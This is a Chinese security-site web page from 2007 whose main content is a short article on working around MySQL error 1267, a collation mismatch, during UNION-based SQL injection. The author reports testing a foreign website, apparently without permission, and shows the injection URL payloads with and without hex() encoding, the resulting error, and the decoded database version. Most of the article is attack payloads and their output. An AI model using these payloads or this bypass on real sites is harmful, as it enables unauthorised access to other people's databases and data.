个人 企业
用户名:
密码:
 
企业服务   安全学院   安全资讯
安全动态  |  前沿技术  |  黑客防范安全漏洞防毒杀毒编程技术安全案例 |  电子政务产品推荐网管技术安全采购产品测评在线代理OICQ
检测评估安全学院软件下载互动交流安全沙龙应急咨询技术认证安全人才技术社区嘉宾聊天安全调查
  资讯 频道 技术    

一分钟注册享受免费网站安全评估
国际黑客防范高峰论坛官方网站被黑
移动网站被黑 黑客留言恳请降低话费
14万存款一夜间被通过网上支付花光
工行网银漏洞:盗取技术被公然叫卖
新闻热点

美国谋划夺取全球“制网权”
攻击指定IP地址及端口的黑客病毒
“黑客”三天侵吞21万获刑11年
微软浏览器IE7被发现存在两个漏洞
黑客入侵万达广场网站 提醒修复漏洞
软件热点
完美卸载V2007 完整版
防黑菜鸟必学系列视频教程
c语言视频教学30讲第14讲
黑客攻防绝招之三十六计
redhatlinux9安装的全程录像
IIS6最佳安全性实战
浅谈政府门户网站的网络安全
常用电脑密码破解技巧
保障Windows系统安全设置方法
黑客入侵无线网络常用手段
网络协同办公安全解决方案
中小企业上网安全解决方案
电子商务网站安全方案
防范Foxmail泄露邮箱密码
美国欲谋夺全球“制网权” 
微软补丁带来新问题 著名黑客提建议
网上窃贼“黑”你钱不困难 听专家忠告
黑客网上贴出400个明星电话号码
   
 
MySQL注射时ErrorNo.1267的突破过程
时间:2007-10-24 8:57:10 作者:安全培训学院第一  出处:www.sec120.com

测试个国外的站时:

url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*

返回错误:

Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation ’UNION’

MySQL Error No. 126

看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。

解决办法:转为其他编码如hex。

url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*


成功得到hex(version())的值为:

342E312E332D62657461

回Mysql查询下得到:

mysql> select 0x342E312E332D62657461;
+------------------------+
| 0x342E312E332D62657461 |
+------------------------+
| 4.1.3-beta |
+------------------------+
1 row in set (0.00 sec)

 
评论 | 收藏 | | 打印 | 关闭

相关新闻链接
网络管理基础知识 (08-02-12) ORACLE公司之起源 (08-02-12)
字符集转换的原因 (08-02-12) Mysql中文字符FAQ (08-02-12)
Mysql常见问题 (08-02-12) 做微软人的五大核心素质 (08-02-12)
一道微软面试的智力测验题 (08-02-12) 微软的CAPTCHA机制被破解 (08-02-12)
苹果暗将用户数据加密到音乐文件中遭指责 (08-02-12) 设置IIS目录中某些文件的可写属性 (08-02-08)
     
关于Sec120 | 服务产品 | 联系我们 | 招贤纳才 | 广告服务 | 网站律师 | 网站地图 | 我要投稿

 

 互联安全网  粤ICP备06118359 Copyright 1999-2009 All Right Reserved.